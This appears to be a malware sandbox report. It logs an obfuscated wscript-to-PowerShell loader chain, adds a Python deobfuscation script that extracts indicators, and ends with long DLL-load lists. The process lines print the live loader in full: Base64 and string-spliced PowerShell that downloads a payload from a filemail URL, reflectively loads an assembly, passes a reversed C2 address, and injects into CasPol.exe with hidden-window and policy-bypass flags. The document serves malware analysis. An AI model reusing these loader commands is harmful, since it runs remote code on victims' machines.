                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
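                    The wscript.exe → powershell.exe → powershell.exe → CasPol.exe chain above can be unwrapped without running it. The Python below is an added example written for this report, not code from Joe Sandbox or from the sample. It takes the second-stage command line exactly as the log prints it (the decoded `$Codigo`), replays the `'a'+'b'` joins, the three `.rePLACe()` calls and the string reversals the loader performs at runtime, and lists the indicators. The `$verBoSeprEFereNCe.TOstrInG()[1,3]+'X'` trick resolves to `ieX` because PowerShell's default `$VerbosePreference` is `SilentlyContinue` (characters 1 and 3 are `i` and `e`); the `[Char]N` evaluator also covers the `[cHAR]58+[CHaR]0X3A` form used by the mshta-launched command. The filemail download itself is not in the report, so the last step runs on a constructed stand-in built in the same `<<BASE64_START>>` / reversed-Base64 layout; the C2 URL, the `VAI` method name and the `CasPol` argument are derived from the log text, not assumed. The stage-1 decoder is exercised on the leading 44 characters of the `$Codigo` blob from the log.

```python
"""Static unwrapping of the PowerShell loader chain in the process-creation log.

Added example for this report (not Joe Sandbox or sample code). It replays the
'a'+'b' joins, the .Replace() chain and the string reversals the loader performs
at runtime, so the indicators can be listed without executing anything.
"""
import base64
import re

# Stage 2 exactly as the log prints it (the decoded $Codigo), outer quotes removed.
STAGE2 = (
    "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;"
    "opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);"
    "opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);"
    "opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;"
    "opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];"
    "opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);"
    "opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, "
    "ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));')"
    ".rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$')"
)
# Leading 44 characters of the stage-1 $Codigo blob from the same log lines.
CODIGO_PREFIX = "JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygp"
# PowerShell's default $VerbosePreference; the loader indexes into it to spell 'ieX'.
VERBOSE_PREFERENCE_DEFAULT = "SilentlyContinue"
# Constructed stand-in for the filemail download (the real file is not in the
# report): a fake assembly wrapped in the marker / reversed-Base64 layout.
CONSTRUCTED_PAYLOAD = b"MZ\x90\x00 constructed fake assembly, not the real payload"
CONSTRUCTED_DOWNLOAD = ("<html>junk<<BASE64_START>>"
                        + base64.b64encode(CONSTRUCTED_PAYLOAD).decode()[::-1]
                        + "<<BASE64_END>>junk")


def decode_codigo(b64_text: str) -> str:
    """Stage 1: $Codigo is plain Base64 of UTF-8 text, no reversal at this layer."""
    return base64.b64decode(b64_text).decode("utf-8")


def ps_literal(expr: str) -> str:
    """Evaluate the small expression grammar used for .Replace() arguments:
    a single-quoted literal, or [Char]N pieces (decimal or 0x hex) joined by '+'."""
    expr = expr.strip()
    if expr.startswith("'") and expr.endswith("'"):
        return expr[1:-1]
    codes = re.findall(r"\[char\]\s*(0x[0-9a-f]+|\d+)", expr, re.I)
    return "".join(chr(int(c, 0)) for c in codes)


def resolve_invoker(cmd: str) -> str:
    """$VerbosePreference.ToString()[1,3]+'X' spells the Invoke-Expression alias
    out of the default value 'SilentlyContinue' (index 1 = 'i', index 3 = 'e')."""
    m = re.search(r"\$verbosepreference\.tostring\(\)\[(\d+),(\d+)\]\+'(\w)'", cmd, re.I)
    if not m:
        return ""
    i, j = int(m.group(1)), int(m.group(2))
    return VERBOSE_PREFERENCE_DEFAULT[i] + VERBOSE_PREFERENCE_DEFAULT[j] + m.group(3)


def deobfuscate(cmd: str) -> str:
    """Stage 2 -> stage 3: join the fragments inside (('...')) and apply the
    trailing .Replace() calls in source order, as PowerShell would at runtime."""
    m = re.search(r"\(\('(.*?)'\)(\.replace\(.*)$", cmd, re.I | re.S)
    if not m:
        raise ValueError("no (('...').Replace(...) construct found")
    program, chain = m.group(1).replace("'+'", ""), m.group(2)
    call = re.compile(r"\.replace\(\s*('[^']*'|\([^)]*\)|\[[^,]*)\s*,\s*"
                      r"('[^']*'|\([^)]*\)|[^)]*)\)", re.I)
    for old, new in call.findall(chain):
        program = program.replace(ps_literal(old), ps_literal(new))
    return program


def extract_iocs(program: str) -> dict:
    """Indicators from the de-obfuscated stage 3."""
    urls = re.findall(r"https?://[^\s'\"]+", program)
    # Arguments passed to the reflectively loaded method; the C2 URL among them is
    # stored reversed ('//:ptth'), so flip any argument that ends that way.
    inv = re.search(r"\.Invoke\(\$null,\s*@\((.*?)\)\)", program, re.S)
    args = re.findall(r"'([^']*)'", inv.group(1)) if inv else []
    method = re.search(r"\.GetMethod\('([^']*)'\)", program)
    return {
        "stage_urls": urls,
        "reflective_load": "[System.Reflection.Assembly]::Load(" in program,
        "invoked_method": method.group(1) if method else None,
        "c2_urls": [a[::-1] for a in args if re.search(r"//:s?ptth$", a)],
        # Fifth argument; it matches the CasPol.exe child the log shows next.
        "host_process_arg": args[4] if len(args) > 4 else None,
        "markers": re.findall(r"<<[A-Z0-9_]+>>", program),
    }


def recover_embedded_assembly(downloaded_text: str, start: str = "<<BASE64_START>>",
                              end: str = "<<BASE64_END>>") -> bytes:
    """Stage 3 -> stage 4 offline: the loader cuts the text between the markers,
    reverses it and Base64-decodes it into the assembly it hands to Assembly.Load()."""
    s = downloaded_text.index(start) + len(start)
    e = downloaded_text.index(end, s)
    return base64.b64decode(downloaded_text[s:e][::-1])


if __name__ == "__main__":
    print("invoker:", resolve_invoker(STAGE2))
    for key, value in extract_iocs(deobfuscate(STAGE2)).items():
        print(f"{key:16}:", value)
```

Run it as a script to print the recovered indicators; `deobfuscate()` is the piece to reuse on other samples that use the same `(('...'+'...').Replace(...)` wrapper, and `recover_embedded_assembly()` gives the .NET assembly for dnSpy or ilspy once the downloaded file has been obtained from the sandbox's dropped-file or PCAP view.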
                    Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: webio.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: webio.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: propsys.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: ntmarta.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: d2d1.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: dwrite.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: dxgi.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: d3d11.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: d3d10warp.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: msls31.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: webio.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
